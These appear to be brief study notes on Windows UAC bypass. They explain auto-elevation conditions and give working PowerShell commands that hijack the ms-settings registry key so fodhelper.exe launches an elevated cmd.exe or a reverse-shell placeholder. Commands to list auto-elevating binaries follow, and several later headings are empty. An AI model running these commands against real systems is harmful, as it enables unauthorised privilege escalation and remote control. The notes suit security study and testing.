UAC Bypass

some executables can auto-elevate, achieving high IL without any user intervention. This applies to most of the Control Panel’s functionality and some executables provided with Windows.

condition to meet auto-elevate:

• The executable must be signed byt the windows publisher

• The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/\

• Executable files (.exe) must declare the autoElevate element inside the manifests.

• sigcheck tool can be used to view the manifest for autoelevate privileges

Fodhelper

Fodhelper.exe is one of Windows default executables in charge of managing Windows optional features, including additional languages, applications not installed by default, or other operating-system characteristics. Like most of the programs used for system configuration, fodhelper can auto elevate when using default UAC settings so that administrators won’t be prompted for elevation when performing standard administrative tasks. While we’ve already taken a look at an autoElevate executable, unlike msconfig, fodhelper can be abused without having access to a GUI.

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd> fodhelper

Spaw anything:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'your-reverse-shell' -Force

using metasploit:

Other ways

find auto-elevating applications on windows 10:

# 64 bit apps
Get-ChildItem "C:\Windows\System32\*.exe" | Select-String -pattern "<autoElevate>true</autoElevate>"

# 32 bit apps
Get-ChildItem "C:\Windows\SysWOW64\*.exe" | Select-String -pattern "<autoElevate>true</autoElevate>"

eventvwr.exe & Registry Hijacking

TpmInit.exe